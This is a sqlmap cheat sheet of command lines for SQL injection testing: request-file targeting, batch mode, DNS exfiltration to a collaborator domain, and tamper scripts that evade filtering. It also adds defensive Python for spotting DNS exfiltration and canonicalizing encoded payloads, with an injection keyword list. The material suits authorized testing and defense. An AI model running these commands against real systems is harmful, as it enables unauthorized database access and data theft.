# SQLmap

### Documentation

<https://github.com/sqlmapproject/sqlmap/wiki/Usage>

### From Request - HTTP:80

```
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

### From Request - HTTPS:443

```
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

Alternatively, the http.request file can carry the header `Host: server:443`; sqlmap then treats the target as HTTPS because of the port.

### Batch mode (no interactive questions)

```
sqlmap -r http.request --force-ssl --answers="follow=Y" --batch
```

### DNS Collaborator (run as root)

Tip: register a second HTTP proxy listener on port 8081 and send all sqlmap probes through it, so that the proxy history can be filtered by listener and sqlmap traffic is kept apart from manual browsing.

Use the `--dns-domain` switch to instruct sqlmap to use DNS exfiltration probes against your collaborator domain.

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5
```
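From the defender's side, the DNS exfiltration mode above leaves a clear trace: the target's DBMS resolves hostnames under the attacker-controlled zone whose labels carry the retrieved data. The following is an added example (not part of the original page or of sqlmap) that scans constructed resolver log lines and groups suspicious queries by client and zone. The log format, the sample zone `oast-collab.test`, and the heuristic that exfiltrated chunks appear as long hex-only labels are assumptions made for the example, not sqlmap's exact wire format.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed resolver log, one query per line: "<timestamp> <client> <qtype> <qname>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 A www.example.test
2024-05-01T10:00:02Z 10.0.0.5 A ab12.41646d696e3a7365637265743132.cd34.oast-collab.test
2024-05-01T10:00:02Z 10.0.0.5 A ab13.7573657240646f6d61696e2e746c64.cd35.oast-collab.test
2024-05-01T10:00:03Z 10.0.0.7 A mail.example.test
2024-05-01T10:00:04Z 10.0.0.5 A ab14.70617373776f72643132333435.cd36.oast-collab.test
2024-05-01T10:00:05Z 10.0.0.7 AAAA cdn.example.test
"""

# Heuristic (assumption for this example): exfiltrated data shows up as long
# hex-only labels, or as an unusually long label prefix, below the zone.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$", re.IGNORECASE)
LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_line(line: str) -> Optional[Tuple[str, str, str, str]]:
    """Split one log line into (timestamp, client, qtype, qname); None if malformed."""
    m = LINE.match(line.strip())
    return m.groups() if m else None


def registered_zone(qname: str) -> str:
    """Simplification: treat the last two labels as the zone (no public-suffix list)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def looks_like_exfil(qname: str) -> bool:
    """True if the labels below the zone look like encoded data chunks."""
    labels = qname.rstrip(".").split(".")
    prefix = labels[:-2]
    if any(HEX_LABEL.match(label) for label in prefix):
        return True
    # A very long prefix is suspicious even when the encoding is not hex.
    return sum(len(label) for label in prefix) >= 50


def find_exfil_candidates(log_text: str, min_queries: int = 3) -> Dict[Tuple[str, str], List[str]]:
    """Group suspicious queries by (client, zone); keep groups with enough queries to matter."""
    hits: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        _ts, client, _qtype, qname = rec
        if looks_like_exfil(qname):
            hits[(client, registered_zone(qname))].append(qname)
    return {key: names for key, names in hits.items() if len(names) >= min_queries}


if __name__ == "__main__":
    for (client, zone), names in find_exfil_candidates(SAMPLE_LOG).items():
        print(f"{client} -> {zone}: {len(names)} suspicious queries")
```

The threshold `min_queries` keeps a single odd lookup from raising an alert; a real deployment would also compare the zone against an allowlist of known CDNs and service providers, whose hostnames can legitimately contain long hashed labels.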

### Tampering

Tamper scripts transform (encode) the payload before it is sent; select them with the `--tamper` switch.

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode" 
```

A list of all tamper scripts is available via the `--list-tampers` switch or in the `/tamper` folder of the GitHub repository.

{% embed url="https://github.com/sqlmapproject/sqlmap/tree/master/tamper" %}

### URL target & Parameters

```
sqlmap -u http://domain?id=1 -p id
```

You can read the HTTP request from a file and mark the injection point with an asterisk symbol (`*`).

```
sqlmap -r ./sql.req
```

where `sql.req` contains the raw HTTP request, with the asterisk (`*`) marking where the payload is injected:

```
GET /path/to/username* HTTP/1.1
Host: servername:port
```
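To make the request-file convention concrete, here is an added example (not part of the original page or of sqlmap's own parser) that reads a raw request in the layout sqlmap accepts with `-r`, reports where the `*` markers sit, and applies the `Host: ...:443` rule from the HTTPS section to infer the scheme. The sample request, its host name and its parameter names are constructed placeholders.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

MARKER = "*"

# Constructed sample request: request line, headers, blank line, body.
SAMPLE_REQUEST = (
    "POST /path/to/username* HTTP/1.1\r\n"
    "Host: servername:443\r\n"
    "User-Agent: example-client/1.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "param1=value*&param2=fixed"
)


@dataclass
class ParsedRequest:
    method: str
    target: str
    version: str
    headers: List[Tuple[str, str]] = field(default_factory=list)
    body: str = ""

    def host(self) -> str:
        for name, value in self.headers:
            if name.lower() == "host":
                return value
        return ""

    def scheme(self) -> str:
        # A Host header ending in :443 is taken as an HTTPS target.
        return "https" if self.host().endswith(":443") else "http"

    def injection_points(self) -> List[str]:
        """Every place a '*' marker occurs: request target, header values, body."""
        points = []
        if MARKER in self.target:
            points.append("request-line target")
        for name, value in self.headers:
            if MARKER in value:
                points.append(f"header {name}")
        if MARKER in self.body:
            points.append("body")
        return points


def parse_request_file(text: str) -> ParsedRequest:
    """Parse a raw HTTP request; accepts CRLF or LF, first blank line ends the headers."""
    parts = re.split(r"\r?\n\r?\n", text, maxsplit=1)
    head = parts[0]
    body = parts[1] if len(parts) > 1 else ""
    lines = head.splitlines()
    if not lines:
        raise ValueError("empty request file")
    request_line = lines[0].split()
    if len(request_line) < 2:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target = request_line[0], request_line[1]
    # sqlmap tolerates a missing version; default it like an HTTP/1.1 client would.
    version = request_line[2] if len(request_line) > 2 else "HTTP/1.1"
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line.strip():
            continue
        if ":" not in line:
            raise ValueError(f"malformed header line: {line!r}")
        name, value = line.split(":", 1)
        headers.append((name.strip(), value.strip()))
    return ParsedRequest(method, target, version, headers, body)


def load_request_file(path: str) -> ParsedRequest:
    """Convenience wrapper for a request saved to disk (e.g. from a proxy)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return parse_request_file(fh.read())


if __name__ == "__main__":
    req = parse_request_file(SAMPLE_REQUEST)
    print(req.method, req.scheme(), req.host(), req.injection_points())
```

Running the block on the sample prints `POST https servername:443 ['request-line target', 'body']`, which is exactly the information sqlmap needs from such a file: the scheme, the host, and the positions to test.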

### HTTP Proxy

```
sqlmap --proxy=http://127.0.0.1:8080 
```

### Databases

The most common DBMS values are listed below; for the remaining ones see the [sqlmap wiki, `--dbms`](https://github.com/sqlmapproject/sqlmap/wiki/Usage#force-the-dbms).

```
--dbms=mssql|mysql|postgresql|oracle
```

### Base64 Encoding

By default sqlmap URL-encodes payload values in the query string. When a parameter must carry its payload base64-encoded instead, name that parameter with the `--base64` switch:

```
sqlmap -u domain?p1=value --base64=p1
```
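Both the tamper scripts above (the Tampering section) and the `--base64` switch change only how a payload is encoded on the wire, which is why input inspection that matches on the raw parameter value misses them. The following added example (not part of the original page or of sqlmap) shows a naive keyword check beside one that canonicalizes the value first by undoing percent-encoding and base64 layers. The keyword list is a constructed stand-in for a real ruleset, and `percent_encode_all` is this example's own approximation of what a URL-encode-everything tamper such as `charencode` produces, not sqlmap's code.

```python
import base64
import binascii
from urllib.parse import unquote

# Constructed keyword list for the demonstration; a real ruleset is far larger.
KEYWORDS = ("union select", "information_schema", "sleep(")


def percent_encode_all(value: str) -> str:
    """Percent-encode every character (assumption: approximates a charencode-style tamper)."""
    return "".join(f"%{ord(c):02X}" for c in value)


def decode_base64_if_valid(value: str) -> str:
    """Return the decoded text if value is strict, UTF-8-decodable base64; else unchanged."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return value
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return value


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Peel off percent-encoding and base64 layers until the value stops changing."""
    current = value
    for _ in range(max_rounds):
        decoded = decode_base64_if_valid(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current.lower()


def naive_match(value: str) -> bool:
    """Inspects the raw parameter value as received."""
    return any(keyword in value.lower() for keyword in KEYWORDS)


def canonical_match(value: str) -> bool:
    """Inspects the value after canonicalization."""
    return naive_match(canonicalize(value))


if __name__ == "__main__":
    sample = "1 UNION SELECT 1"  # constructed input
    for label, variant in (
        ("plain", sample),
        ("percent-encoded", percent_encode_all(sample)),
        ("base64", base64.b64encode(sample.encode()).decode()),
    ):
        print(f"{label:16} naive={naive_match(variant)!s:5} canonical={canonical_match(variant)}")
```

The bounded `max_rounds` loop matters: decoding until a fixed point handles double-encoded values without turning a hostile input into an unbounded decode loop, and the strict `validate=True` base64 check keeps ordinary alphanumeric values from being misread as base64.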

### HTTP method - DELETE

```
sqlmap --method=DELETE -u http://domain -p param1
```
